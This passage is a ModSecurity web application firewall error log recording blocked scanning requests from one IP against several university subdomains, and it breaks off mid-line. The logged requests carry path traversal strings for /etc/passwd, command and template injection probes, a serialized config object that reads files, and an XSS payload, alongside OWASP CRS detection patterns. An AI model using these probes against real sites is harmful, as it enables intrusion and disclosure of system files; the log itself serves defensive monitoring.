[Tue Aug 29 11:42:14.359872 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAdTA-IAAAAY"]
[Tue Aug 29 11:42:14.361181 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAdV7Z0AAAAa"]
[Tue Aug 29 11:42:14.381925 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAdZZpkAAAAf"]
[Tue Aug 29 11:42:14.407780 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAcvBjYAAAAJ"]
[Tue Aug 29 11:42:14.417431 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAdTA-MAAAAY"]
[Tue Aug 29 11:42:14.419772 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAdKXNkAAAAK"]
[Tue Aug 29 11:42:14.419828 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAdPLyUAAAAT"]
[Tue Aug 29 11:42:14.424829 2023] [:error] [pid 1888] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAdgyC0AAAAj"]
[Tue Aug 29 11:42:14.425615 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAc360AAAAAO"]
[Tue Aug 29 11:42:14.432476 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAdQ3fIAAAAV"]
[Tue Aug 29 11:42:14.433318 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAcsLF4AAAAE"]
[Tue Aug 29 11:42:14.468197 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAdOeP4AAAAS"]
[Tue Aug 29 11:42:15.393338 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:cat_id: ${system(ls)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO13J8Co-f0AAAdV7Z8AAAAa"]
[Tue Aug 29 11:42:15.425378 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13J8Co-f0AAAcoNhkAAAAF"]
[Tue Aug 29 11:42:15.434847 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:cat_id: ${system(ls)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO13J8Co-f0AAAdeQ0AAAAAQ"]
[Tue Aug 29 11:42:15.450187 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13J8Co-f0AAAcsLGAAAAAE"]
[Tue Aug 29 11:42:17.389909 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAdTA-cAAAAY"]
[Tue Aug 29 11:42:17.394113 2023] [:error] [pid 1892] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAdkUQIAAAAm"]
[Tue Aug 29 11:42:17.395558 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAddJrEAAAAh"]
[Tue Aug 29 11:42:17.401602 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAc92woAAAAD"]
[Tue Aug 29 11:42:17.401964 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAcsLGMAAAAE"]
[Tue Aug 29 11:42:18.408743 2023] [:error] [pid 1888] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KsCo-f0AAAdgyDQAAAAj"]
[Tue Aug 29 11:42:19.374501 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:search_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:search_key: {{1337*1338}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/search"] [unique_id "ZO13K8Co-f0AAAdhHzUAAAAB"]
[Tue Aug 29 11:42:19.375795 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:search_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:search_key: {{1337*1338}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/search"] [unique_id "ZO13K8Co-f0AAAc92w0AAAAD"]
[Tue Aug 29 11:42:19.407596 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAdUc0sAAAAZ"]
[Tue Aug 29 11:42:19.412301 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAcvBkAAAAAJ"]
[Tue Aug 29 11:42:19.419123 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAc92w8AAAAD"]
[Tue Aug 29 11:42:19.428642 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAcsLGcAAAAE"]
[Tue Aug 29 11:42:19.430534 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAdECbYAAAAW"]
[Tue Aug 29 11:42:20.361714 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13LMCo-f0AAAdhHzcAAAAB"]
[Tue Aug 29 11:42:21.542070 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAdUc08AAAAZ"]
[Tue Aug 29 11:42:21.547180 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAc-50oAAAAN"]
[Tue Aug 29 11:42:21.549213 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAcvBkQAAAAJ"]
[Tue Aug 29 11:42:21.561174 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAdPLy0AAAAT"]
[Tue Aug 29 11:42:21.568508 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAdECbsAAAAW"]
[Tue Aug 29 11:42:22.369758 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LsCo-f0AAAdeQ00AAAAQ"]
[Tue Aug 29 11:42:23.383436 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver 